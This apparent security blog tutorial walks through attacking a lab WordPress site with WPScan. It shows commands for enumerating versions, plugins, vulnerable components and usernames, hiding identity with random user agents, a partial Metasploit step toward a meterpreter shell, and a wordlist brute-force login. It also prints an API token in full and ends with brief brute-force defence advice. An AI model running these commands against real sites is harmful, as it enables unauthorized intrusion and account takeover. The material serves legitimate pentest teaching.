Hey folks, in this article we will discussing how we can find vulnerability in any WordPress website by using WPScan tool. Also in the last we will learn how to protect himself from brute force attack
Various tools are available for penetration testing on WordPress CMS, but WPScan is specifically designed for penetration testing on WordPress. WPScan is also known as black box WordPress vulnerability scanner because we can use this tool to scan remote WordPress installations to find security issues.
Kali Linux ( Tested on 2020.1 ) = Attacker
Ubuntu = WordPress CMS ( Victim)
Lets take a look 🙂 !!
WPScan comes pre-installed in kali linux operating system, Hence you can start this tool by type WPScan in your terminal.
Now lets try to grab the version of wordpress by using the following command.
wpscan --url http://192.168.0.105/wordpress
Here you can see that the upload directory has open on web server and we has successfully received the version of wordpress.
If you want to find about the theme so you can use the following command.
Usage : t = Theme
wpscan --url http://192.168.0.105/wordpress --enumerate t
You can obtain the details about the plugin which is installed on that web server.
Usage : p = Popular Plugin
wpscan --url http://192.168.0.105/wordpress --enumerate p
If you want to check the themes are vulnerable or not so you can execute the following command.
Usage : vt = vulnerable themes
wpscan --url http://192.168.0.105/wordpress --enumerate vt
With help of following command you can find the vulnerable plugins.
Usage : vp = vulnerable plugins
wpscan --url http://192.168.0.105/wordpress --enumerate vp
Random User Agent feature help us to hide our identity so this is advantage for hackers.
Usage : rua = Random User Agent
wpscan --url http://192.168.0.105/wordpress/ --rua
Most of the time the normal scan are not able to find the vulnerability in website, Hence to perform advance scan you should have your own API Token. You can get your token from this website.
Now lets try to scan with API Token.
rua = Random User Agent
vt = Vulnerable theme
vp = Vulnerable plugin
–api-token = your API token
wpscan --url http://192.168.0.105/wordpress/ --enumerate --rua --enumerate vp vt --api-token 6Fejr5GPkdaYszG53555553wVisu8tGMBfNYozUl5w
After completing the scan you can see that we have received vulnerable plugins.
Now we have to check the exploitation of vulnerable plugins to get the direct meterpreter session of the web server.
Now we will exploit of that web server by using the following command.
set targeturi wordpress
set rhosts 192.168.0.105
A soon as we execute this payload the meterpreter session will be comes here.
Brute Force Attack
If you want to try brute force attack on web server, so first of all you have to some information about the web server such as username which you can easily obtain with the help of following command.
Usage : u = username
wpscan --url http://192.168.0.105/wordpress/ --enumerate u
Now we can perform the brute force attack using the following command.
wpscan --url http://192.168.0.105/wordpress -U shubham -P /root/pass.txt
Avoid Brute Force Attack
If you want to protect your web server from brute force attack then you can install the following plugin and activate it.
Now change some configurations as per your need.
After activate the plugin you can observe brute force attack will be fails due to 2 valid attempts option and after that server will block you.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.